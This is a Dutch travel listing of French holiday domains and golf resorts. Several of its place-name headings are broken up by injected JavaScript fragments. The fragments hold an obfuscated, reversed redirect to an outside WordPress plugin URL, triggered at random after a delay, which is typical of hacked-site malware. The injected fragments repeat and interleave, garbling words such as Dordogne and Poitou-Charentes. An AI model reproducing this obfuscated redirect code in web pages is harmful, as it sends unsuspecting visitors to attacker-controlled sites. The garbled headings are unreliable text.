Les Pieds dans L’eau, Dortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dogne
Les Pieds dans l’ eau (voeten in het water) dankt zijn naam aan het waterrijke domein waar Ludo, Annemieke en zonen Tammo en Dirk Lokin sinds 2003 wonen. Ze beheren een hameau (gehuchtje) dat bestaat uit twee gites, een studio en een kleinschalige forellenkwekerij en –rokerij.....
Op ongeveer 370 km vanaf de Nederlandse grens en 45 km vanaf het centrum van Parijs ligt, in een prachtig heuvelachtig landschap, Crecy Golf, twee 18 holes golfbanen met in het clubhuis 29 zeer comfortabele 2, 4 en 6 pers. appartementen. Een prima restaurant, zwembad, tennisbaan, driving range enz. complementeren dit resort.
Recht tegenover het kleine stationnetje van Pommeuse vindt je de ingang van camping Le Chêne Gris met fantastische luxe stacaravans. Hiervandaan heeft u een mooie uitvalsbasis om op verschillende schitterende golfbanen te spelen. Je zult hartelijk welkom worden geheten door de (Nederlandstalige) medewerkers van Iris Parc, die je ook graag informeren over praktische zaken en uitstapjes in de omgeving.
Het landgoed van het 17e eeuwse kasteel Chateau De Salles is ruim 54 hectaren groot! De Résidence heeft er met 116 villa's alle rust en ruimte voor een onbezorgde vakantie. Het is een geliefd vakantiepark in een bosrijke omgeving en toch vlak bij de stranden. Privacy is gewaarborgd door de ruime percelen.
Domain Les Forges, Poitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tou-Charentes
Vanaf uw eigen terras in luttele minuten op één van de grootste golfbanen van Frankrijk, die verlokking komt nu erg dichtbij. Midden in de streek Poitou-Charentes is het exclusieve villapark Les Forges gerealiseerd, op het 19e eeuwse Domaine Les Forges, met ruim opgezette villa's.
Domaine de Lanzac, Dortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dogne
Glooiende natuurgebieden zover het oog kan zien. Een kronkelende rivier, de Dordogne, de mooiste Franse dorpen en steden. En dan ineens ligt daar Domaine de Lanzac, een schitterende locatie voor uw vakantie.
Gelegen in een vallei tegen een helling met een prachtig uitzicht. Een tuin met diverse sfeervolle hoekjes en gezellige terrassen. Een plek om lekker tot rust te komen. Genietend van een heerlijk wijntje, lekker eten en ’s avonds de ondergaande zon waant ieder zich hier als God in…….
Beleef uw vakantie op het prachtige landgoed van Castel du Bouysset. Uitdagende 9-holes golfbaan, drivingrange en puttinggreen in het heuvelachtig landschap van Vallée de la Thèze.
Te midden van bijna 5 hectare grasland, omzoomd door bossen, vindt u Rastaillou, een oude, geheel gerestaureerde boerderij, waar serene rust en een prachtige natuur u verzekeren van een uitstekende vakantie!
Het authentieke oude pand, het terrein vol met fruitbomen en rozenstruiken, de landelijke omgeving, het is het helemaal! Een plek om te ontspannen en te genieten van al het goede dat het Franse land tussen Le Loir en La Loire te bieden heeft.
Domaine d’Essendieras, Dortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dogne
Domaine d’Essendiéras biedt heel veel kwaliteit, wat betreft de accommodatie, sfeer en omgeving. Het Domein wordt gesierd met twee kastelen. Het jongste kasteel stamt uit de 19e eeuw, het andere kasteel stamt uit de 16e eeuw. De twee kastelen vormen samen met de bijgebouwen een gesloten binnenplaats: een fantastisch middeleeuws decor.
Hostellerie La Croix Blanche, Poitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tou-Charentes
Het charmante plattelandshotel is gelegen in de Loirevallei tussen Angers en Tours, midden in het historische stadje Fontevraud l'Abbaye.